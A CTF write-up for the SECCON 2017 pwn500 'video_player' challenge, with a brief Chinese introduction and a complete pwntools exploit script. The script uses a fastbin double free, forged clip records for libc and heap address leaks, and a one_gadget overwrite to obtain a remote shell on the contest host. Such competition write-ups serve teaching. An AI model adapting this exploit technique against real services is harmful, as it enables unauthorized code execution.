Seccon2017-pwn500-video_player
感觉这个题目并不值 500 分，有些地方比较牵强，漏洞也比较明显，解题方法有多种。出题者把堆的布局随机化了，不过使用 fastbin double free 的话，可以完全忽视被打乱的堆。
from pwn import *
#context.log_level='debug'
#wah
# NOTE(review): this script is Python 2 only — `print pid`, `raw_input`, and
# `ord(tmp8[i])` (indexing a str yields a 1-char str in Py2, an int in Py3)
# all break under Python 3.  Nothing here is self-contained: every helper
# drives the remote "video_player" menu protocol over a pwntools tube.


def newaudioclip(r, bitrate, length, data, description):
    """Drive the service's create-clip menu (option 1) and pick audio (option 2).

    Args:
        r: pwntools tube connected to the service.
        bitrate, length, data, description: raw byte strings sent verbatim
            at the corresponding prompts (no length checks are done here;
            the server's limits are not visible in this file).
    """
    r.recvuntil('>>> ')
    r.sendline('1')
    r.recvuntil('>>> ')
    r.sendline('2')
    r.recvuntil('Audio Bitrate : ')
    r.send(bitrate)
    r.recvuntil('Audio Length (seconds) : ')
    r.send(length)
    r.recvuntil('Audio Data : ')
    r.send(data)
    r.recvuntil('Add description : ')
    r.send(description)

def newvideoclip(r, rs, fps, num, data, description):
    """Drive the create-clip menu (option 1) and pick video (option 1).

    Args mirror newaudioclip: every value is sent as-is at its prompt.
    """
    r.recvuntil('>>> ')
    r.sendline('1')
    r.recvuntil('>>> ')
    r.sendline('1')
    r.recvuntil('Video Resolution : ')
    r.send(rs)
    r.recvuntil('FPS : ')
    r.send(fps)
    r.recvuntil('Number of Frames : ')
    r.send(num)
    r.recvuntil('Video Data : ')
    r.send(data)
    r.recvuntil('Add description : ')
    r.send(description)

def newmetadataclip(r, date, owner):
    """Drive the create-clip menu (option 1) and pick metadata (option 4).

    Only two prompts are answered (date, owner); both are sent verbatim.
    """
    r.recvuntil('>>> ')
    r.sendline('1')
    r.recvuntil('>>> ')
    r.sendline('4')
    r.recvuntil('Date of Creation : ')
    r.send(date)
    r.recvuntil('Owner of video : ')
    r.send(owner)


def editvideoclip(r, inx, rs, fps, num, data, description):
    """Drive the edit menu (option 2) for the clip at index `inx`.

    The prompt sequence is the same as newvideoclip except the final prompt
    reads 'Edit description : '.  `inx` is sent as a line, the rest raw.
    """
    r.recvuntil('>>> ')
    r.sendline('2')
    r.recvuntil('Enter index : ')
    r.sendline(inx)
    r.recvuntil('Video Resolution : ')
    r.send(rs)
    r.recvuntil('FPS : ')
    r.send(fps)
    r.recvuntil('Number of Frames : ')
    r.send(num)
    r.recvuntil('Video Data : ')
    r.send(data)
    r.recvuntil('Edit description : ')
    r.send(description)

def delclip(r, inx):
    """Drive the delete menu (option 4) for the clip at index `inx`."""
    r.recvuntil('>>> ')
    r.sendline('4')
    r.recvuntil('Enter index : ')
    r.sendline(inx)

# Module-level leak holder filled by playvideoclip (name refers to the libc
# `close` symbol whose address is read back; it is not the builtin).
close = 0
def playvideoclip(r, inx):
    """Play clip `inx` (option 3) and read back 8 bytes as an address leak.

    The service's playback output appears to be masked with 0xcc per byte
    (hedged: only the XOR here shows that), so the loop undoes the mask
    before u64().  The result is stored in the global `close` and printed.
    """
    global close
    r.recvuntil('>>> ')
    r.sendline('3')
    r.recvuntil('Enter index : ')
    r.sendline(inx)
    r.recvuntil('Playing video...\n')
    tmp8 = r.recv(8)
    final8 = ''
    for i in range(0, 8):
        # Undo the per-byte 0xcc mask (Py2: tmp8[i] is a 1-char str).
        final8 += chr(ord(tmp8[i])^0xcc)
    close = u64(final8)
    print('leaked close is %x'%close)

# Second leak holder, filled by playvideoclip1 (a heap chunk address).
chunk = 0
def playvideoclip1(r, inx):
    """Same playback-and-unmask routine as playvideoclip, storing into `chunk`.

    Duplicated rather than shared with playvideoclip; only the target global
    and the log message differ.
    """
    global chunk
    r.recvuntil('>>> ')
    r.sendline('3')
    r.recvuntil('Enter index : ')
    r.sendline(inx)
    r.recvuntil('Playing video...\n')
    tmp8 = r.recv(8)
    final8 = ''
    for i in range(0, 8):
        final8 += chr(ord(tmp8[i])^0xcc)
    chunk = u64(final8)
    print('leaked chunk is %x'%chunk)

def playvideoclip2(r, inx):
    """Trigger playback of clip `inx` without reading anything back.

    Used as the final step, where playback is expected to hand control to
    the interactive shell rather than print data.
    """
    r.recvuntil('>>> ')
    r.sendline('3')
    r.recvuntil('Enter index : ')
    r.sendline(inx)

# Target selection: the `if 0:` branch is the local test instance, the
# `else:` branch the (now defunct) contest host.  Flip the literal to switch.
if 0:
    ip = '127.0.0.1'
    port = 10001
else:
    ip = 'video_player.pwn.seccon.jp'
    port = 7777

def getpid():
    """Print the local service's PID and block until Enter is pressed.

    Only meaningful against the local instance (presumably a pause to attach
    a debugger); against the remote host pidof() finds nothing and the call
    just prints an empty list and waits.  Python 2 syntax (`print pid`).
    """
    import time
    exe = 'video_player'
    time.sleep(0.1)
    pid= pwnlib.util.proc.pidof(exe)
    print pid
    raw_input('go!')

def pwnpwn():
    """Run the full interaction against ip/port and drop to an interactive tube.

    High-level flow (what the visible calls do; the server-side bug that makes
    each step work is not shown in this file):
      1. create one audio clip and one video clip, edit the video clip, then
         delete both — the writeup says the technique is a fastbin double
         free, which would mean one of these frees hits an already-freed
         chunk; modern glibc (tcache `key` check, safe-linking) aborts on
         exactly that pattern, which is the mitigation a defender relies on;
      2. create a fresh video clip and overwrite its contents with a crafted
         record so that "playing" it reads 8 bytes from an address in the
         binary's data region, giving a libc pointer leak;
      3. rebase a hard-coded one_gadget offset on that leak (offsets match a
         specific libc build not named here), plant it via a metadata clip,
         leak a heap chunk address the same way, then point the record at
         that chunk and play it to transfer control.
    Both raw_input() calls are manual pauses.
    """
    r = remote(ip, port)
    r.recvuntil('What is your movie name?')
    getpid()
    r.send('\x00'*0xff)
    #newaudioclip(r, bitrate, length, data, description):
    newaudioclip(r, p16(30), p32(0x50), '\x00', '\x00')
    #1
    newvideoclip(r, p64(0), p32(0), p32(0x30), '\x00', '\x00')
    # Edit grows the frame count from 0x30 to 0x50 before the deletes;
    # presumably this is what makes the subsequent frees overlap — confirm
    # against the binary.
    editvideoclip(r, '1', p64(0), p32(0), p32(0x50), '\x00', '\x00')

    delclip(r, '0')
    delclip(r, '1')

    #2
    newvideoclip(r, p64(0), p32(0), p32(0x50), '\x00', '\x00')

    # Crafted clip record: first qword looks like a code pointer in the
    # non-PIE binary, last qword the address that playback will read from
    # (0x604028 is in the 0x60xxxx data range typical of a non-PIE ELF).
    data = p64(0x00402968) + p64(0x0) + p32(0x0) + p32(0x50) + p64(0x00604028)
    editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data, '\x00')
    playvideoclip(r, '2')

    #3
    # libc offsets for the target's libc build (not identified on this page);
    # binsh/system are computed but never used below — only one_gadget is.
    close_offset = 0xF78B0
    binsh_offset = 0x18CD17
    system_offset = 0x45390
    one_gadget_offset = 0xf1117
    binsh = close - close_offset + binsh_offset
    system = close - close_offset + system_offset
    one_gadget = close - close_offset + one_gadget_offset
    data1 = p64(0)*2+p64(one_gadget)
    newmetadataclip(r, data1, '\x00'*0x1f)

    # Same record shape as `data`, now reading from 0x604400+0x18 to obtain
    # the heap address of the metadata clip just created.
    data2 = p64(0x00402968) + p64(0x0) + p32(0x0) + p32(0x50) + p64(0x0000000000604400+3*8)
    editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data2, '\x00')
    playvideoclip1(r, '2')

    raw_input('here')
    # Final record: only the leaked chunk pointer; description padded to
    # 0x2f bytes of 'b'.
    data3 = p64(chunk)
    editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data3, 'b'*0x2f)
    playvideoclip2(r, '2')
    r.interactive()

pwnpwn()